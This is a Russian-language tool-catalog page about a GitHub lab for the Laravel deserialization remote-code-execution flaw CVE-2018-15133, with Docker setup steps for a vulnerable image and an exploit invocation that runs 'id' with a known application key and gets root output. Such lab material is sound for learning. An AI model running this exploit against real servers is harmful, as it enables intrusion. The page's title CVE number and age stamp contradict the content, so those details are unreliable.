Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Lab-for-cve-2018-15133 — Выполнение эксплойта десериализации с CVE-2017-5941 | Kitploit
Инструменты/GitHubGitHub/cr4zyd14m0nd137/lab-for-cve-2018-15133
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubcr4zyd14m0nd137/lab-for-cve-2018-15133

Lab-for-cve-2018-15133

Выполнение эксплойта десериализации с CVE-2017-5941

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
13 лет назадЕщё не проверено

Краткое описание:

Эксплуатация уязвимости десериализации CVE-2018-15133 Этот эксплойт использует уязвимость десериализации в Laravel Framework до версии 5.5.40 и в версиях 5.6.x до 5.6.29.

Описание

Удаленное выполнение кода может произойти в результате вызова unserialize для потенциально недоверенного значения X-XSRF-TOKEN. Это включает метод decrypt в Illuminate/Encryption/Encrypter.php и PendingBroadcast в gadgetchains/Laravel/RCE/3/chain.php в phpggc. Атакующий должен знать ключ приложения, что обычно никогда не происходит, но может случиться, если атакующий ранее имел привилегированный доступ или успешно совершил предыдущую атаку.

Предварительные требования

Для выполнения этого эксплойта вам необходимо установить следующее на вашу машину:

  • Docker в основной ОС https://docs.docker.com/desktop/install/windows-install/
  • Этот Docker-образ https://hub.docker.com/r/kozmico/laravel-poc-cve-2018-15133
  • Эксплойт из этого репозитория.
  • Машина атакующего, в данном случае я буду использовать машину Kali Linux, работающую в VMware в режиме моста.

Шаги для воспроизведения:

  1. Загрузите и установите Docker.
  2. Откройте Docker от имени администратора.
  3. Откройте cmd и загрузите Docker-образ.

docker pull kozmico/laravel-poc-cve-2018-15133

  1. Запустите Docker-образ:

docker run --name my-laravel-app -p 8000:80 -d kozmico/laravel-poc-cve-2018-15133

  1. Откройте Docker и запустите контейнер:

Это запустит машину Laravel. Попробуйте открыть машину в браузере, чтобы убедиться, что она работает. Это можно сделать с помощью IP-адреса и порта. Чтобы узнать IP в Windows, выполните: ipconfig В Linux: ifconfig

  1. Если у вас возникли проблемы с запуском Docker, возможно, вам потребуется выполнить эти команды для работы с Docker:

wsl --set-default-version 2 wsl --update

  1. На данный момент всё должно быть настроено, и остаётся только запустить эксплойт.

Запуск эксплойта

  1. Загрузите файл эксплойта на свою машину.
  2. Откройте терминал и перейдите в папку, где находится файл эксплойта.
  3. Выполните следующую команду для эксплуатации сервера:

./CVE-2018-15133 -URL http://localhost:8000 -API_KEY 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= -command "id" Это должно вернуть ответ с идентификатором машины, которую вы хотите атаковать. Вы также можете использовать аналогичные команды для запроса папок и выполнения других задач.

Ответ: uid=0(root) gid=0(root) groups=0(root)

Заключение

В заключение, в ходе этой уязвимости мы смогли наблюдать важность обновления фреймворков. Поскольку эти инструменты могут иметь уязвимости в безопасности и широко используются, мы подвергаемся риску, если не обновляемся.

Ссылка на:

https://github.com/0xSalle/cve-2018-15133

Скачать инструмент